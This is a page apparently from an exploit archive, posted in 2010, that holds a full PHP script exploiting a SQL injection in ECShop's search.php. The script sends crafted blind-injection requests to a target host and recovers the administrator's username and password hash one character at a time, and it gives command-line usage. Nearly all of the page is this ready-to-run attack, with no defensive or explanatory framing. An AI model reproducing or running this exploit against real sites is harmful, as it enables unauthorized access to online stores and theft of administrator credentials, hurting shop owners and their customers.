Home / os / win7

ECShop Search.php SQL Injection Exploit

Posted on 22 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ECShop Search.php SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================
ECShop Search.php SQL Injection Exploit
=======================================


# Author: Jannock
# Software Link: http://www.ecshop.com
# Version: ECShop All Version
# Tested on:
# CVE :
# WAVDB: WAVDB-01606
# Code :
 
&lt;?php
ini_set(&quot;max_execution_time&quot;,0);
error_reporting(7);
 
function usage()
{
global $argv;
exit(
&quot;
--+++============================================================+++--&quot;.
&quot;
--+++====== ECShop Search.php SQL Injection Exploit========+++--&quot;.
&quot;
--+++============================================================+++--&quot;.
&quot;

[+] Author: jannock&quot;.
&quot;
[+] Team: [url]http://wavdb.com/[/url]&quot;.
&quot;
[+] Usage: php &quot;.$argv[0].&quot; &lt;hostname&gt; &lt;path&gt; &lt;goods_id&gt;&quot;.
&quot;
[+] Ex.: php &quot;.$argv[0].&quot; localhost / 1&quot;.
&quot;

&quot;);
}
 
function query($pos, $chr, $chs,$goodid)
{
switch ($chs){
case 0:
$query = &quot;1=1&quot;;
break;
case 1:
$query = &quot; ascii(substring((select user_name from ecs_admin_user limit
0,1),{$pos},1))={$chr}&quot;;
break;
case 2:
$query = &quot; ascii(substring((select password from ecs_admin_user limit
0,1),{$pos},1))={$chr}&quot;;
break;
case 3:
$query = &quot; length((select user_name from ecs_admin_user limit 0,1))={$pos}&quot;;
break;
}
$list=array(&quot;1' or 1=1) and 1=2 GROUP BY goods_id HAVING num = '1'
union select $goodid,1 from ecs_admin_user where 1=1 and &quot;. $query
.&quot;/*&quot;=&gt;&quot;1&quot;);
$query = array(&quot;attr&quot;=&gt;$list);
$query = str_replace('+', '%2b', base64_encode(serialize($query)));
return $query;
}
 
function exploit($hostname, $path, $pos, $chr, $chs,$goodid)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80);
 
$message = &quot;GET &quot;.$path.&quot;/search.php?encode=&quot;.query($pos, $chr,
$chs,$goodid).&quot; HTTP/1.1
&quot;;
$message .= &quot;Host: $hostname
&quot;;
$message .= &quot;Connection: Close

&quot;;
 
fwrite($conn, $message);
while (!feof($conn))
{
$reply .= fgets($conn, 1024);
}
fclose($conn);
return $reply;
}
 
 
function crkusername($hostname, $path, $chs,$goodid)
{
global $length;
$key = &quot;abcdefghijklmnopqrstuvwxyz0123456789&quot;;
$chr = 0;
$pos = 1;
echo &quot;[+] username: &quot;;
while ($pos &lt;= $length)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);
 
if (preg_match (&quot;/javascript:addToCart/i&quot;, $response))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo &quot;
&quot;;
}
 
function crkpassword($hostname, $path, $chs,$goodid)
{
$key = &quot;abcdef0123456789&quot;;
$chr = 0;
$pos = 1;
echo &quot;[+] password: &quot;;
while ($pos &lt;= 32)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);
if (preg_match (&quot;/javascript:addToCart/i&quot;, $response))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo &quot;

&quot;;
}
 
function lengthcolumns($hostname, $path,$chs, $goodid)
{
echo &quot;[+] username length: &quot;;
$exit = 0;
$length = 0;
$pos = 1;
$chr = 0;
while ($exit==0)
{
$response = exploit($hostname, $path, $pos, $chr, $chs,$goodid);
if (preg_match (&quot;/javascript:addToCart/i&quot;, $response))
{
$exit = 1;
$length = $pos;
break;
}
else
{
$pos++;
if($pos&gt;20)
{
exit(&quot;Exploit failed&quot;);
}
}
}
echo $length.&quot;
&quot;;
return $length;
}
 
 
if ($argc != 4)
usage();
$hostname = $argv[1];
$path = $argv[2];
$goodid = $argv[3];
$length = lengthcolumns($hostname, $path, 3, $goodid);
crkusername($hostname, $path, 1,$goodid);
crkpassword($hostname, $path, 2,$goodid);
 
?&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-22]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :